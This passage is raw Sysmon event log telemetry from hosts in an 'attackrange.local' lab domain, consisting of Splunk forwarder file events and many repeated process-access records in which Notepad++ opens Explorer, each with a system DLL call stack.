23542300x80000000000000001047432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.271{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7849814C227CBE92595CBB5907D2AA83,SHA256=ACA831EA5E06DB7FC755DDE21F82351F10137E95599610AC6AAD74357B3D7D9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 23542300x8000000000000000806918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:29.363{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6D26D7A3BA5B4D09A3A9CAC9A220705,SHA256=D0327D79C92F305DC0DFA918AF96245A61AA3F7484833E305A17CF6332056B54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 